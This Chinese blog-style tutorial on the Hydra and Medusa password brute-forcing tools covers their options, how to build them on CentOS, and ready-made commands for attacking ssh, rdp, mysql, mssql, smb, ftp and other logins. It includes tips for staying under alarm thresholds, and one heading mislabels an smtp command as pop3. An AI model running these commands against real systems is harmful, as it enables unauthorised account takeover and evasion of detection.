快捷搜索:

Hydra初级破解工具,永不消失的

日期:2019-08-14编辑作者:澳门新葡8455手机版

原标题:永不消失的 '0day' [ 弱口令 ]

Hydra初级破解工具

 帮助命令:hydra -h  //查看基本用法

0x01 hydra 选项用途简要说明

参数说明:

hydra [[[-l login|-L file] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w time] [-f] [-s PORT] [-S] [-vV] server service [OPT]
-R 继续从上一次进度接着破解。
-S 采用SSL链接。
-s PORT 可通过这个参数指定非默认端口。
-l LOGIN 指定破解的用户,对特定用户破解。
-L FILE 指定用户名字典。
-p PASS 小写,指定密码破解,少用,一般是采用密码字典。
-P FILE 大写,指定密码字典。
-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。
-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。
-M FILE 指定目标列表文件一行一条。
-o FILE 指定结果输出文件。
-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
-t TASKS 同时运行的线程数,默认为16。
-w TIME 设置最大超时的时间,单位秒,默认是30s。
-v / -V 显示详细过程。
server 目标ip
service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} 
http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener 
postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere 
teamspeak sip vmauthd firebird ncp afp等等。

 

这里暂以linux平台使用为例,实际测试中也推荐大家在linux平台上自己编译,不然有些服务模块可能不太好使,虽然已经有编译好的win版本,但不太建议实际用,如果真没办法非要在win上跑,建议大家还是用7.x之前的版本吧,新版本中确实还有很多问题

爆破过程:

-R 从上次未完成的爆破文件[hydra.restore]中读取爆破进度并接着上次的进度继续往后爆破

Ssh 协议:

hydra -L user.txt  -P pass.txt  192.168.1.2 ssh

 

 

-S 爆破https时需要加上该选项

3389远程爆破 rdp协议

hydra 192.168.20.110 rdp -L user.txt -P pass.txt -V 

其中命令: 192.168.20.87 是目标ip

Rdp是协议

-L 是指定一个字典

-P 指定密码

-V 显示爆破详细过程

 

-s 如果要爆破的服务用的不是默认端口,可以用这个来手工指定服务端口号

ftp:

hydra ip ftp -L 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

 

-l/-L 指定用户名 / 指定用户名字典文件

-p/-P 指定密码 / 指定密码字典文件[字典务必要自己精心准备,别人的始终不适合自己的环境]

-e 尝试空密码[n]/尝试将用户名作为密码[s]/尝试将用户名和密码位置调换爆破[r]

-f/-F 当爆出第一个正确的密码后,就自动退出程序,-f表示单个'进程'退出,-F表示全局退出

-t 指定爆破进程,实际爆破中给8个左右即可,太高了容易报警,速度慢不怕,就怕动静儿太大,这里只是个参考,如果目标内网环境相对比较松,可以适当再放大一点,当然,肯定不能无限大,基于目标系统而定,大家酌情使用吧

-w 设定超时时长,默认32秒,一般情况10秒即可

-4/-6 4表示用ipv4,6表示用ipv6

-v 显示爆破信息

-M 把要爆破的目标都写到一个文件中,每行对应一个目标,支持域名,CIDR格式,或者单个ip的形式

0x02 在linux中编译安装hydra,此处暂以centos6.8 x64为例:

务必事先安装好所需的各种依赖库,因为hydra在破解各种服务的时候,可能会用到各类服务自己devel库中的一些函数,也就意味着你可能要装很多个库,因为它本身就支持很多服务的在线爆破,其实,就这一点来说,hydra本身做的事情并不算多,因为大多都要依赖别的库函数来实现,这样来看的话,hydra本质上只是把各种服务整合了一下

# tar -zxf libssh-0.4.8.tar.gz

# cd libssh-0.4.8

# mkdir build

# cd build/

# cmake -DCMAKE_INSTALL_PREFIX=/usr -DCMAKE_BUILD_TYPE=Debug -DWITH_SSH1=ON ..

# make && make install

# echo $?

# /sbin/ldconfig

0x03 安装 hydra 的各种依赖库

澳门新葡8455手机版 ,下面中的有一些库,有可能在你的环境中直接用yum装不上,没办法了,只能你自己稍微勤快点,去谷歌上找找,然后再单独手工把它装上,放心,肯定能找到解决办法的,如果中间有库装不上,可能在编译hydra时确实是可以编译成功,但等到后期实际爆破某些服务的时候就会出现各种问题

# yum groupinstall "Development Tools"

# yum install openssl-devel pcre-devel ncurses-devel ncurses postgresql-devel libssh-devel subversion-devel gcc cmake mysql-devel subversion-devel ncpfs-devel postgresql-devel libncurses-devel libidn-devel libpqxx-devel apr-devel apr-util-devel firebird-devel afpfs-ng-devel

# echo $?

0x04 编译安装hydra

可以看到就hydra 本身的编译安装过程倒是非常简单,你也可以用–prefix指定安装目录,走的时候方便顺手把整个安装目录干掉即可

# tar -zxf hydra-8.0.tar.gz

# cd hydra-8.0

# ./configure && make && make install

# hydra -h

0x05 针对各类服务的实例爆破演示:

爆破mssql [大多可能都是直接针对sa,想快速getshell,实际测试速度和精度都还不错]:

# hydra -L user.txt -P pass.txt -f -v -t 20 mssql://192.168.3.23

澳门新葡8455手机版 1

爆破smb [速度还是比较快的,针对普通域内网的效果可能会好点]:

# hydra -L user.txt -P pass.txt -f -v -t 20 smb://192.168.3.23

澳门新葡8455手机版 2

爆破rlogin [该服务用的可能已经不太多了]:

# hydra -L user.txt -P pass.txt -f -v rlogin://192.168.3.161

澳门新葡8455手机版 3

爆破mysql [可能主要也是针对root,如果目标有waf,可能就不太好使了,过多的数据库连接容易触发报警,如果目标是linux,爆破速度还是蛮快的]:

# hydra -l root -P pass.txt -f -v -t 20 mysql://192.168.3.13

澳门新葡8455手机版 4

爆破postgresql [实际测试中,速度还是蛮快的咧]:

# hydra -L user.txt -P pass.txt -f -v -t 20 postgres://192.168.3.23

澳门新葡8455手机版 5

爆破rdp [ 对于08以上的系统基本就是个废,在本地多次测试均未成功,不过对于03以下的机器目前暂时还是比较可行的]:

# hydra -L user.txt -P pass.txt -f -v -t 20 rdp://192.168.3.23

澳门新葡8455手机版 6

爆破ssh [正常情况下的速度还可以,前面装libssh就是为了爆破它的]:

# hydra -l root -P pass.txt -f -v -t 20 ssh://192.168.3.160

澳门新葡8455手机版 7

爆破pop3[不需要域名后缀,只需正确的账号密码即可,同样,很不稳定,有兴趣,可以拿常用公共邮箱测测精度,如:gmail,outlook,126,163,sina,qq…]:

# hydra -L user.txt -P pass.txt -v -f -t 20 smtp://192.168.3.160

澳门新葡8455手机版 8

爆破pop3[不需要域名后缀,只需正确的账号密码即可,同样,很不稳定,有兴趣,可以拿常用公共邮箱测测精度,如:gmail,outlook,126,163,sina,qq…]:

# hydra -L user.txt -P pass.txt -v -f -t 20 smtp://192.168.3.160

爆破ftp [还算靠谱,不过需要前期好好搜集下目标的用户名]:

# hydra -L user.txt -P pass.txt -f -v -t 20 ftp://192.168.3.23

澳门新葡8455手机版 9

爆破telnet [靠谱]:

# hydra -L user.txt -P pass.txt -f -v -t 20 telnet://192.168.3.23

澳门新葡8455手机版 10

爆破vnc [无须用户名,本地多次测试都未成功]:

# hydra -P pass.txt -f -v -t 20 vnc://192.168.3.23

爆破snmp [暂时还好使]:

# hydra -P pass.txt -f -v -t 20 snmp://192.168.3.160

澳门新葡8455手机版 11

爆破svn [实际中多次测试均未跑出来]:

# hydra -L user.txt -P pass.txt -f -v -t 20 svn://192.168.3.13

爆破ldap2/3(同样跑不出来):

# hydra -L user.txt -P pass.txt -f -v -t 20 ldap2://192.168.3.161

爆破redis:

hydra 使用小结:

支持的服务比较多,这里就不一一演示了,大家可根据实际情况针对性的用,就个人使用来讲,hydra精度真的很一般 [尤其是在爆破各类邮件服务时,比如,pop3,smtp[这个还好点儿] ,imap,时好时坏,极不稳定,原因暂未找],速度也极为一般,单单就稳定性来讲,不是很靠谱,不过这里仅供参考,建议大家还是根据自己的实际情况来,一面之词,不足为信,大家可以自己实际使用为准

0x05 使用 medusa

偶尔会断,原因暂未查,不过,如果是实际爆破,相对来讲,个人还是比较推荐这个,尤其当拿下的目标机器是linux时,虽然,它支持的服务可能并没有hydra那么多,但个人还是比较喜欢它 [稳定,精度较高],毕竟是帮忙搞了不少事情,不幸的是,它没有win版,作者说它自己用Cygwin始终都没编译成功,如果你编译成功了,请立马告诉他,他也许还会请你喝杯啤酒啥的,嘿嘿……

支持爆破的服务模块,在kali中的默认路径如下:

/usr/lib/medusa/modules

自己编译后的默认服务模块路径,默认如下

/usr/local/lib/medusa/modules

关于不同系统平台所要安装的一些依赖库,在工具官方站点中已有详细说明,链接如下,请自行查看

编译安装medusa和hydra几乎没什么区别,非常简单[此处同样是以centos6.8 x64为例]:

# yum groupinstall "Development Tools"

# yum install openssl-devel libssh2-devel postgresql-devel subversion-devel freerdp-devel# tar -zxf medusa-2.2.tar.gz

# cd medusa-2.2# vi INSTALL

# ./configure && make && make install

本文由澳门新葡8455手机版发布于澳门新葡8455手机版,转载请注明出处:Hydra初级破解工具,永不消失的

关键词:

机上有酒吧及健身房,2012年787大量交付

原标题:这家航空集团将生产世界最中距离直飞航班,机上有酒吧及健美房 据亚太地区航空核心CAPA报纸发表,近年来...

详细>>

醣质营养素是怎样发现的,深度學習如何應用在

原标题:藥物設計開外掛!深度學習怎样應用在新藥開發? 採訪編輯|柯旂 美術編輯|張語辰 談到『醣質營養素』...

详细>>

【澳门新葡8455手机版】国产减速机奋力突围,他

原标题:独家 | Smart轮获投960万 他首创磁悬浮减速机 精度约3角秒 趁着环球人口红利的毁灭,自动化生产供给越来越...

详细>>

澳门新葡8455手机版PRL导读-2018年121卷08期

原标题:PRL导读-2018年121卷08期 原标题:PRL导读-2018年121卷09期 序 序 言 言 我们本着服务于中国物理学者和物理专业研...

详细>>